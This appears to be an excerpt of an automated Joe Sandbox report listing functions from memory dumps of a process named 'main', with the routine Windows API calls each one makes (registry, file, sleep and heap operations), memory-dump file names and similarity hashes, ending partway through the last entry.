Instruction ID: 86ce30af62eefcd1e362b89dd4a3caa6e9a74b2ee184367626b2dbb0807cdfa8
Opcode Fuzzy Hash: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
Instruction Fuzzy Hash: 6EF06DA2A0C75B82E5529F10F8447BA6254AF447A8F48023BDD9D866B2EF2CD9899300

Function 00007FFE0E16B307 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
registry_get_value, xrefs: 00007FFE0E16B3F6

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
Instruction ID: 1a299213a822cc5f253556a3a435b4da673161fc3fbd51081930cf426b5c8ecc
Opcode Fuzzy Hash: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
Instruction Fuzzy Hash: 34F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300

Function 00007FFE0E16B38E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
registry_get_value, xrefs: 00007FFE0E16B3F6

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
Instruction ID: 2f7950778ae422de24e56455a1765d966b00fb18ad4645a8d2ceac97e60131d9
Opcode Fuzzy Hash: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
Instruction Fuzzy Hash: 56F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300

Function 00007FFE0E16B39C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
registry_get_value, xrefs: 00007FFE0E16B3F6

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
Instruction ID: 0e92d6aa44722bc36fcf251fd76824ec65a13b4387d5e34c320950e713e27049
Opcode Fuzzy Hash: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
Instruction Fuzzy Hash: 1BF090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899700

Function 00007FFE0E16B418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
registry_get_value, xrefs: 00007FFE0E16B3F6

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
Instruction ID: dd454f8397a2f4b4e64eb1f64dba90335dafc04b0a8137ec97555e6c13e4577c
Opcode Fuzzy Hash: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
Instruction Fuzzy Hash: 30F090A2A0C75B82E6529F10F8447BA6254FF447E8F084237DDDD876B1EF2CD9899300

Function 00007FFE11EC9A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC99CD

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

registry_get_value, xrefs: 00007FFE11EC9A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC9A1D

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 90650f36d771836d13a11600e8b2b318ae25d023a5e1960832098a05e009ab10
Instruction ID: 3808918733f5d3219b37a972a01e3e456a750084781d296ec3787d9b3c8224d3
Opcode Fuzzy Hash: 90650f36d771836d13a11600e8b2b318ae25d023a5e1960832098a05e009ab10
Instruction Fuzzy Hash: 06F09C52608B4652EB518F41FC443BB625CBF447B4FC802B5DD4D466E0FF2DE9859304

Function 00007FFE11EC99BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC99CD

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

registry_get_value, xrefs: 00007FFE11EC9A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC9A1D

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 98d8349ad0ad8563a4aac54408a1b4208963d96b0c40359daae556f45f636e14
Instruction ID: d770e7abbcaa98278e9d79841efa38dd61ddc116d88c5184d3e9d9c4680be7d2
Opcode Fuzzy Hash: 98d8349ad0ad8563a4aac54408a1b4208963d96b0c40359daae556f45f636e14
Instruction Fuzzy Hash: 45F09C52608B4652EB518F81FC443BB625CAF447B4FC802B5DD4D466E0FF2DF9859304

Function 00007FFE11EC99AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC99CD

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

registry_get_value, xrefs: 00007FFE11EC9A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC9A1D

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: bb41b63993abec7c408ad49b714f270fcd64442e604e9d810aa8fc911f13786b
Instruction ID: df2cd96a473b5bbccabafc8e7f93043f396135d58a53f332fedce50068341ce3
Opcode Fuzzy Hash: bb41b63993abec7c408ad49b714f270fcd64442e604e9d810aa8fc911f13786b
Instruction Fuzzy Hash: 43F09C52608B4652EB528F41FC443BB625CAF447B4FC802B5DD4D466E0FF2DF9859304

Function 00007FFE11EC9927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC99CD

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

registry_get_value, xrefs: 00007FFE11EC9A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC9A1D

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: bc364ee3c0204cc18faf25454832cb5fb0d7574441680ffd8687f8ddca3ccec5
Instruction ID: 7ed9e30256452d0a6275bfda7d15274e4a1509d574642499ddafcbe7c71f7465
Opcode Fuzzy Hash: bc364ee3c0204cc18faf25454832cb5fb0d7574441680ffd8687f8ddca3ccec5
Instruction Fuzzy Hash: 44F09C52608A4652EB518F41FC443BB625CBF447B4FC802B5DD4D466E0FF2DF5859304

Function 00007FFE11EC991D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC99CD

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

registry_get_value, xrefs: 00007FFE11EC9A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC9A1D

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5a5f454751b329f477918e1b74ce8c9d1f5dbe2abfd7061627b6f44434bac4c8
Instruction ID: ae40f86ca4435b31f063b66c2447bd2e2f9e9bcc13ab7efac2e44c1c0ebbba75
Opcode Fuzzy Hash: 5a5f454751b329f477918e1b74ce8c9d1f5dbe2abfd7061627b6f44434bac4c8
Instruction Fuzzy Hash: 92F09662608B4A52EB528F82FC443BB625CAF447B5FC802B5ED4D466E1FF2DF9859304

Function 00007FFE1150184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE1150192B
Sleep.KERNEL32 ref: 00007FFE11501937

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
Instruction ID: 309efaa2cb18cb10259dc987b9eb08ae61cddbb36f74de60f506c0f034e1c8ef
Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
Instruction Fuzzy Hash: 2F310860E0CE0382F7319BE7A88427C325AAF447B0F6407B9D47D466F2DE2CE7859642

Function 00007FFE0EB4EF2A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0EB4F00B
Sleep.KERNEL32 ref: 00007FFE0EB4F017

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
Instruction ID: 5cbd6e0f43837169666d4f5b09b899f6a8e5a4a6c1d290eb45965486bb63f2d6
Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
Instruction Fuzzy Hash: 7331D9A2E2970382F6306F68A8843792251FF84775F640331E4FD4A6F5DE2DE9459E81

Function 00007FFE0E16184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0E16192B
Sleep.KERNEL32 ref: 00007FFE0E161937

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
Instruction ID: c647a3e78296f41c0fa26a15a73ab8ee7f1f1b9dfdee4252dca916f587bc6732
Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
Instruction Fuzzy Hash: E3310C21F0D603A2F6705B65E88427C2265AF44770F600377D8FE466F7DE2CEA85A781

Function 00007FFE11EC364A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE11EC372B
Sleep.KERNEL32 ref: 00007FFE11EC3737

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
Instruction ID: 02429f256fc01d5838e832e106884b126abc035b3381545a41791ebeb628ee2e
Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
Instruction Fuzzy Hash: 6B310760B0CE4382EB20ABA6EC8437B2259AF45370F9013B6D47D467F1DE2CF6855751

Function 00007FF76A90886D Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76A901360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90137E

SleepEx.KERNEL32 ref: 00007FF76A9088DC

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: HandleModuleSleep
String ID:
API String ID: 1071907932-0
Opcode ID: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
Instruction ID: 93e60936be1f98bcaa8b641ebd49656ae39e0c96908773cd592752a06179c83e
Opcode Fuzzy Hash: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
Instruction Fuzzy Hash: 0B01D122B0C743C2F7987614E4503BAB291AB943C4FB44078EA1ECB685EE6CD845C360

Function 00007FF76A90299E Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2
_errno.MSVCRT ref: 00007FF76A90294C
_errno.MSVCRT ref: 00007FF76A902967
fread.MSVCRT ref: 00007FF76A9029EA
GetProcessHeap.KERNEL32 ref: 00007FF76A902A1F
HeapFree.KERNEL32 ref: 00007FF76A902A32

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
Instruction ID: 05b9d96cf56d74709aedf7e1cf2d5d756e83743c8bfa2df28cdd6d6d8efd7081
Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
Instruction Fuzzy Hash: DAE0D801F1835382FA702569028073585812F487C4FB614F88F0ED66E9CD3DE4010C20

Function 00007FF76A902997 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF76A902715
_errno.MSVCRT ref: 00007FF76A9027B7
_errno.MSVCRT ref: 00007FF76A9027D2
_errno.MSVCRT ref: 00007FF76A90294C
_errno.MSVCRT ref: 00007FF76A902967
fread.MSVCRT ref: 00007FF76A9029EA
GetProcessHeap.KERNEL32 ref: 00007FF76A902A1F
HeapFree.KERNEL32 ref: 00007FF76A902A32

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$Heap$FreeProcessfclosefread
String ID:
API String ID: 4240746492-0
Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
Instruction ID: 96d91fd7480217c82c107adf8f0a36b3d41408be87374aa3a32b9b3a8b7eef27
Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
